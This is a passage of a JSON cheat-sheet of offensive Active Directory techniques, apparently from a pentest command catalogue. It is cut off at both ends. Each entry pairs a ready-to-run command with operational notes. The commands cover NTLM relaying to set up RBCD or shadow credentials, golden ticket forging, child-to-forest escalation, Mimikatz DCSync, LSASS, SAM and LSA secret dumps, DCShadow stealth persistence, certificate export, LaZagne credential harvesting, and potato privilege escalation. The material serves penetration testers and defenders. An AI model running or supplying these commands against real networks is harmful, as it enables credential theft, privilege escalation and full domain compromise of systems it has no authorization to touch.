tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX-Interactive","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-Interactive","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Lateral Movement","Collection","Execution"],"nativeCategory":["Lateral Movement","Collection","Exploitation"],"command":"# Relay to SMB and open an interactive client shell\npython3 ntlmrelayx.py -t smb://10.10.10.1 -smb2support -i\n# In another terminal, connect to the spawned session\nnc 127.0.0.1 11000","description":"Impacket's ntlmrelayx.py can hold a relayed SMB session open and expose it as an interactive client rather than running a single command. With -i (--interactive), each successful relay spawns an interactive SMB shell bound to a local TCP port (starting at 11000); connect to it with netcat to browse shares, upload/download files, and read data as the relayed user. This is useful when you want hands-on access to the target's filesystem instead of blind command execution, and pairs with a coercion primitive (PetitPotam, printerbug, dementor) to feed authentications into the relay.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tLocal interactive port: 11000","mitre":[],"requires":["No credentials"],"services":["NTLM","SMB"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX-RBCD","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-RBCD","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Relay coerced machine auth to LDAPS and configure RBCD on the victim object\n# (auto-creates a computer account to delegate from when you hold MachineAccountQuota)\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --delegate-access","description":"Impacket's ntlmrelayx.py relays coerced NTLM authentication from a victim computer to LDAPS on the Domain Controller. With --delegate-access it writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the relayed computer object, granting an attacker-controlled account Resource-Based Constrained Delegation (RBCD) over it. After the relay, getST.py can request a Service Ticket impersonating any user (including a Domain Admin) to the victim. This requires an account to delegate to (create one first with --add-computer or Impacket's addcomputer.py) and a coercion primitive such as PetitPotam or the printer bug to force the victim's machine account to authenticate. LDAPS is preferred because RBCD writes require a channel not protected by LDAP signing.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tAttacker computer account: ATTACKER$","mitre":[],"requires":["No credentials"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX-ShadowCredentials","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-ShadowCredentials","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Persistence","Credential Access","Execution"],"nativeCategory":["Persistence","Credential Access","Exploitation"],"command":"# Add a Key Credential to the target account via relayed write access\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --shadow-credentials --shadow-target 'DC01$'","description":"Impacket's ntlmrelayx.py relays authentication to LDAP/LDAPS and, with --shadow-credentials, performs a Shadow Credentials attack by writing a new Key Credential into the target's msDS-KeyCredentialLink attribute. This adds an attacker-controlled certificate/key pair to the account, allowing later PKINIT authentication to obtain a TGT (and the account's NT hash via UnPAC-the-hash) without changing its password. --shadow-target selects which principal to backdoor; the relayed identity must have write access (GenericWrite/GenericAll) to that object. The attack requires the domain to support Key Trust (a KDC with PKINIT, i.e. an AD CS PKI or Server 2016+). ntlmrelayx saves the generated certificate so you can authenticate with it afterwards using gettgtpkinit.py or PKINITtools.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tShadow target account: DC01$","mitre":[],"requires":["No credentials"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-owneredit","toolId":"wadcoms:Impacket-owneredit","toolName":"Impacket-owneredit","name":"Impacket-owneredit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Persistence"],"nativeCategory":["PrivEsc","Exploitation","Persistence"],"command":"# Set john as the owner of the victim object\nowneredit.py -action 'write' -new-owner 'john' -target 'victim' -dc-ip 10.10.10.1 'test.local/john:password123'","description":"Impacket's owneredit.py reads or changes the owner set in an object's security descriptor over LDAP. Because the owner has implicit WriteDacl, `-action write -new-owner` lets you seize ownership of a target you hold WriteOwner over, then combine it with dacledit.py to grant yourself full control. Use `-action read` first to record the original owner for cleanup. Together owneredit + dacledit reproduce the WriteOwner-to-takeover chain on Linux.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew owner: john\n\n\tTarget object: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-RaiseChild","toolId":"wadcoms:Impacket-raiseChild","toolName":"Impacket-raiseChild","name":"Impacket-RaiseChild","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# Escalate from child-domain admin to forest root via ExtraSid golden ticket\nraiseChild.py test.local/john:password123","description":"Impacket raiseChild.py automates child-domain-to-forest-root privilege escalation by abusing the intra-forest trust. Given Domain Admin credentials in a child domain it DCSyncs the child krbtgt, forges a golden ticket with an Enterprise Admins ExtraSid from the forest root, and uses it to compromise the parent, optionally executing a command on the root DC. Requires child-domain administrative credentials.\n\nCommand Reference:\n\n\tChild domain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-TicketConverter","toolId":"wadcoms:Impacket-ticketConverter","toolName":"Impacket-ticketConverter","name":"Impacket-TicketConverter","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Defense Evasion"],"nativeCategory":["Collection","Defense Evasion"],"command":"# kirbi -> ccache (for Impacket)\nticketConverter.py ticket.kirbi out.ccache\n\n# ccache -> kirbi (for Rubeus/Mimikatz)\nticketConverter.py out.ccache ticket.kirbi","description":"Impacket ticketConverter.py converts between the .kirbi format (used by Mimikatz and Rubeus) and the .ccache format (used by Impacket and MIT Kerberos), in either direction, based on the input file extension. This bridges Windows and Linux tooling: dump a TGT with Rubeus, convert it, and reuse it from an Impacket workflow (or vice versa). It performs no network activity.\n\nCommand Reference:\n\n\tInput ticket: ticket.kirbi\n\n\tOutput ticket: out.ccache","mitre":[],"requires":["Kerberos ticket"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-Ticketer-AES","toolId":"wadcoms:Impacket-ticketer","toolName":"Impacket-ticketer","name":"Impacket-Ticketer-AES","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Persistence","Execution"],"nativeCategory":["Persistence","Exploitation"],"command":"# Forge an AES golden ticket -> administrator.ccache\nticketer.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92 -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local administrator\n\n# Use it\nexport KRB5CCNAME=administrator.ccache","description":"Impacket ticketer.py forges golden (or silver) tickets offline; supplying -aesKey signs the ticket with the krbtgt AES256 key instead of the RC4/NT hash, producing an AES-encrypted TGT that blends in with modern Kerberos traffic. The resulting .ccache can be exported to KRB5CCNAME and used by any Impacket tool for pass-the-ticket. Requires the krbtgt AES key and the domain SID.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tDomain: test.local\n\n\tTarget user: administrator","mitre":["T1558.001"],"requires":["AES key"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:John-keepass2john","toolId":"wadcoms:John","toolName":"John","name":"John-keepass2john","source":"DAEMON","platform":["Linux"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# extract the master-key hash from the .kdbx\nkeepass2john Database.kdbx > hashes.txt\n\n# crack the master password\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt","description":"KeePass databases (.kdbx) looted from a share or a compromised host are frequent sources of privileged credentials. John the Ripper's keepass2john helper converts the database master-key parameters into a crackable hash, which john then attacks with a wordlist. It handles both password-only and keyfile-protected databases (pass the keyfile with -k). Fully offline; a recovered master password opens every secret in the vault.\n\nCommand Reference:\n\n\tKeePass DB: Database.kdbx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1555.005"],"requires":["No credentials"],"references":["https://github.com/openwall/john","https://hashcat.net/wiki/doku.php?id=example_hashes","https://attack.mitre.org/techniques/T1555/005/"],"added":true,"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:John-pfx2john","toolId":"wadcoms:John","toolName":"John","name":"John-pfx2john","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# extract the crackable hash from the .pfx\npfx2john cert.pfx > hashes.txt\n\n# crack the passphrase (john auto-detects the pfx format)\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt","description":"A password-protected PKCS#12 certificate store (.pfx / .p12) recovered during collection can be opened offline. John the Ripper's pfx2john helper extracts the encryption parameters into a crackable hash, which john then brute-forces against a wordlist. Recovering the passphrase unlocks the private key and certificate, which can be used for PKINIT/Schannel authentication (e.g. via certipy or Rubeus). Runs entirely offline with no target interaction.\n\nCommand Reference:\n\n\tPFX File: cert.pfx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1110.002"],"requires":["No credentials"],"services":["ADCS"],"references":["https://github.com/openwall/john","https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate","https://attack.mitre.org/techniques/T1110/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:JuicyPotatoNG-SeImpersonate","toolId":"wadcoms:JuicyPotatoNG","toolName":"JuicyPotatoNG","name":"JuicyPotatoNG-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# -t * tries both token-creation APIs, -l sets the local COM server port\nJuicyPotatoNG.exe -t * -p \"C:\\Windows\\System32\\cmd.exe\" -a \"/c whoami\" -l 9999","description":"JuicyPotatoNG revives the JuicyPotato DCOM abuse against modern Windows by using a specific CLSID and a local COM server on a non-default port to coerce a SYSTEM authentication, then impersonates the token. The -t flag selects the token API: 't' uses CreateProcessWithTokenW (needs SeImpersonatePrivilege), 'u' uses CreateProcessAsUserW (needs SeAssignPrimaryTokenPrivilege), and '*' tries both. It works on Windows 10 / Server 2019 and later where classic JuicyPotato was blocked. Requires SeImpersonate or SeAssignPrimaryToken on the service account.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tCOM listen port: 9999","mitre":[],"requires":["Shell"],"services":["DCOM"],"references":["https://github.com/antonioCoco/JuicyPotatoNG","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Krbrelayx-Unconstrained-TGT","toolId":"wadcoms:Krbrelayx","toolName":"Krbrelayx","name":"Krbrelayx-Unconstrained-TGT","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Privilege Escalation","Execution"],"nativeCategory":["Credential Access","PrivEsc","Exploitation"],"command":"# Export mode: capture forwarded TGTs using the unconstrained account's key\npython3 krbrelayx.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92\n# Then coerce dc.test.local to authenticate (PetitPotam/printerbug) to drop a TGT ccache","description":"krbrelayx.py by dirkjanm abuses Kerberos unconstrained delegation. When you control an account or computer configured with unconstrained delegation, any principal that authenticates to it via Kerberos forwards a usable TGT inside the ticket. Running krbrelayx.py with the account's key (AES key or NT hash) and no relay target puts it in export mode: it starts an SMB/HTTP listener, decrypts incoming Kerberos service tickets, and writes the embedded TGTs to ccache files on disk. Coercing a Domain Controller (via PetitPotam or the printer bug) to authenticate yields the DC's TGT, which can then be used with secretsdump.py for a full DCSync. This is the Kerberos analogue to NTLM relaying and bypasses SMB signing.\n\nCommand Reference:\n\n\tDelegation account AES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain Controller IP: 10.10.10.1\n\n\tOutput ccache: out.ccache","mitre":[],"requires":["AES key"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/krbrelayx","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:LaZagne-All","toolId":"wadcoms:LaZagne","toolName":"LaZagne","name":"LaZagne-All","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"laZagne.exe all","description":"LaZagne is an open-source credential harvester that walks dozens of local software modules - browsers, mail clients, Wi-Fi, LSA secrets, credential vaults, chats, databases, and more - and recovers stored passwords in one pass. The 'all' argument runs every module; results can be written to file with -oN (json), -oA (all formats), or -oJ. Some modules (LSA secrets, Wi-Fi) need administrator rights while browser and app creds are readable in the user's own context, making it a fast triage tool after initial access.\n\nCommand Reference:\n\n\tTarget host: local (current user context)","mitre":["T1555"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/AlessandroZ/LaZagne","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:ldapdomaindump-Enum","toolId":"wadcoms:ldapdomaindump","toolName":"ldapdomaindump","name":"ldapdomaindump-Enum","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Dump all domain objects (users, groups, computers, policy, trusts) to HTML/JSON/greppable files\nldapdomaindump -u 'test.local\\john' -p password123 -o output_dir ldap://10.10.10.1","description":"ldapdomaindump (dirkjanm) authenticates to a Domain Controller over LDAP/LDAPS with any valid domain account and dumps the whole directory - users, groups, computers, domain policy, and trusts - into ready-to-read HTML tables plus machine-parsable JSON and greppable text. It is a fast first-pass inventory when you land your first set of credentials and want an offline overview of the domain before running heavier tooling. Output lands in the directory given with -o (default: current dir).\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/dirkjanm/ldapdomaindump","https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap","https://attack.mitre.org/techniques/T1087/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:ldapnomnom-UserEnum","toolId":"wadcoms:ldapnomnom","toolName":"ldapnomnom","name":"ldapnomnom-UserEnum","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Anonymous, lockout-free username validation via cLDAP LDAP Ping; DCs auto-discovered from DNS\nldapnomnom --input usernames.txt --output output.txt --dnsdomain test.local","description":"ldapnomnom (lkarlslund) anonymously bruteforces valid Active Directory usernames at very high speed by abusing cLDAP LDAP Ping (Netlogon) requests against Domain Controllers. Because a valid name produces a different response than an invalid one, existence can be confirmed without authenticating - so there are no failed logons and no account lockouts, making it far quieter than Kerberos pre-auth enumeration. Feed it a wordlist with --input and it writes the valid names to --output; --dnsdomain lets it auto-discover DCs via DNS. Ideal for pre-credential recon.\n\nCommand Reference:\n\n\tNo_Creds\n\tUsername wordlist: usernames.txt\n\tOutput file: output.txt\n\tDomain: test.local","mitre":["T1087.002"],"requires":["No credentials"],"services":["LDAP","Kerberos"],"references":["https://github.com/lkarlslund/ldapnomnom","https://attack.mitre.org/techniques/T1087/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:ldeep-Enum-All","toolId":"wadcoms:ldeep","toolName":"ldeep","name":"ldeep-Enum-All","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Collect everything into files prefixed 'output' (output_users.json, output_groups.json, ...)\nldeep ldap -u john -p password123 -d test.local -s ldap://10.10.10.1 all output","description":"ldeep is an in-depth LDAP enumeration utility that ships dozens of focused subcommands (users, groups, memberships, trusts, GPOs, delegation, PSOs, and more) under its ldap mode. The all subcommand collects computers, domain_policy, zones, gpo, groups, ou, users, trusts and pso in one pass and writes each to files prefixed with the base name you supply. Run it with any valid domain account when you want a complete, structured snapshot of the directory to grep offline. Individual subcommands (e.g. ldeep ldap ... trusts) can be run afterward for targeted queries.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/franc-pentest/ldeep","https://www.hackingarticles.in/active-directory-enumeration-ldeep/","https://attack.mitre.org/techniques/T1087/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:MANSPIDER-Content-Search","toolId":"wadcoms:MANSPIDER","toolName":"MANSPIDER","name":"MANSPIDER-Content-Search","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Credential Access","Discovery"],"nativeCategory":["Collection","Credential Access","Discovery"],"command":"# Search file CONTENT for 'password' across all readable shares on a host\nmanspider 10.10.10.1 -c password -u john -p password123 -d test.local\n\n# Hunt spreadsheets/office docs mentioning credentials, content-only (no download)\nmanspider 10.10.10.1 -c passw creds -e xlsx docx csv -n -u john -p password123 -d test.local","description":"MANSPIDER (Black Lantern Security) crawls readable SMB shares across one or many hosts and greps inside the files it finds, so it catches secrets buried in documents, spreadsheets and text files rather than just interesting filenames. -c/--content takes one or more regexes matched against extracted file contents (it can parse PDF, Office and other formats), while -f/--filenames and -e/--extensions narrow the crawl by name or type. It downloads matching files to the loot directory by default; add -n/--no-download for a quieter content-only sweep. Useful for wide domain-scale secret hunting once you hold any domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/blacklanternsecurity/MANSPIDER","https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-Crypto-ExportCerts","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-Crypto-ExportCerts","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"mimikatz.exe \"crypto::capi\" \"privilege::debug\" \"crypto::cng\" \"crypto::certificates /systemstore:LOCAL_MACHINE /store:My /export\" exit","description":"Mimikatz crypto::certificates lists and, with /export, extracts certificates and their private keys from a CryptoAPI store to .pfx/.der files, even when the private key was marked non-exportable. crypto::capi (and crypto::cng for CNG keys) patches the key-provider in memory first so the non-exportable flag is bypassed. Point /systemstore at LOCAL_MACHINE for machine certs or CURRENT_USER for user certs; exported .pfx files enable certificate-based (PKINIT) authentication as that principal.\n\nCommand Reference:\n\n\tStore: LOCAL_MACHINE\\My\n\n\tExport password: mimikatz (default for exported .pfx)","mitre":["T1552.004"],"requires":["Shell"],"services":["ADCS"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://attack.mitre.org/techniques/T1552/004/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-DCShadow","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DCShadow","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Defense Evasion"],"nativeCategory":["Persistence","Defense Evasion"],"command":"# Instance 1 (SYSTEM) - stage the change\nmimikatz.exe \"!+\" \"!processtoken\" \"lsadump::dcshadow /object:john /attribute:primaryGroupID /value:512\"\n\n# Instance 2 (Domain Admin) - push the replication\nmimikatz.exe \"lsadump::dcshadow /push\" exit","description":"Mimikatz lsadump::dcshadow temporarily registers a rogue domain controller and pushes attacker-chosen attribute changes into the directory through legitimate replication (MS-DRSR), which sidesteps normal object-modification auditing. It runs as two cooperating instances: an elevated SYSTEM instance stages the change with /object, /attribute and /value, and a second instance holding Domain Admin (or the required replication rights) triggers the push with /push. Use it for stealthy persistence such as writing a primaryGroupID or SIDHistory.\n\nCommand Reference:\n\n\tTarget object: john\n\n\tAttribute: primaryGroupID = 512 (Domain Admins)","mitre":[],"requires":["Shell"],"services":["LDAP","RPC"],"references":["https://github.com/gentilkiwi/mimikatz","https://www.dcshadow.com/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-DCSync-Krbtgt","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DCSync-Krbtgt","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"mimikatz.exe \"privilege::debug\" \"lsadump::dcsync /domain:test.local /user:krbtgt\" exit","description":"Mimikatz lsadump::dcsync impersonates a domain controller and uses the MS-DRSR replication protocol (GetNCChanges) to pull the password data of a chosen account from a live DC, without ever running code on that DC or touching NTDS.dit on disk. Targeting krbtgt yields the KDC key needed to forge Golden Tickets. It requires an account with the Replicating Directory Changes / Replicating Directory Changes All rights (Domain Admins, Enterprise Admins, or a delegated principal).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tTarget user: krbtgt","mitre":["T1003.006"],"requires":["Shell"],"services":["Kerberos","LDAP"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync","https://attack.mitre.org/techniques/T1003/006/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-DPAPI-Masterkey-Cred","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DPAPI-Masterkey-Cred","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"dpapi::masterkey /in:\\\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1339291983-1349129144-367733775-1001\\<GUID>\\\" /sid:S-1-5-21-1339291983-1349129144-367733775-1001 /password:password123\" \"dpapi::cred /in:\\\"%appdata%\\Microsoft\\Credentials\\<GUID>\\\"\" exit","description":"Mimikatz dpapi::masterkey decrypts a user's DPAPI master key from the Protect folder using their password (and SID), and dpapi::cred then uses that cached master key to decrypt a Credential blob into its stored plaintext secret. DPAPI protects saved RDP, browser, scheduled-task, and Credential Manager secrets, so this chain recovers them offline from copied files. If you lack the user's password, dpapi::masterkey /rpc asks the domain controller to decrypt the key with the domain DPAPI backup key.\n\nCommand Reference:\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tPassword: password123","mitre":["T1555.004"],"requires":["Shell","Password"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-LogonPasswords","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LogonPasswords","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit","description":"Mimikatz sekurlsa::logonpasswords reads the authentication material cached in LSASS memory and reconstructs plaintext passwords, NT/LM hashes, and Kerberos keys for every interactive, service, and network logon session on the host. It requires local administrator rights and SeDebugPrivilege, which privilege::debug enables before touching LSASS. This is the classic loud credential dump; on hardened hosts (Credential Guard, PPL, or EDR hooking LSASS) it will fail or be caught, so prefer an offline minidump plus pypykatz when OPSEC matters.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tPrivilege: SeDebugPrivilege","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-LsadumpSAM","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LsadumpSAM","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::sam\" exit","description":"Mimikatz lsadump::sam decrypts the local SAM database using the boot key from the SYSTEM hive and dumps the NT hashes of all local accounts, including the local Administrator. Running it live requires SYSTEM-level access, so token::elevate is used to raise from an administrative shell to SYSTEM. The recovered local hashes are ideal for local pass-the-hash and for spotting password reuse across a fleet where the same local admin hash is shared.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SAM + SYSTEM)","mitre":["T1003.002"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-LsadumpSecrets","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LsadumpSecrets","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::secrets\" exit","description":"Mimikatz lsadump::secrets decrypts the LSA secrets stored under the SECURITY registry hive, exposing service account passwords, scheduled-task credentials, cached DPAPI machine keys, auto-logon passwords, and the machine account secret in cleartext. It needs SYSTEM rights, so token::elevate is chained after privilege::debug. LSA secrets frequently hand over a domain service account password that no other technique reveals.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SECURITY + SYSTEM)","mitre":["T1003.004"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/004/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-PassTheHash","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-PassTheHash","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"mimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:john /domain:test.local /ntlm:2a3de7fe356ee524cc9f3d579f2e0aa7 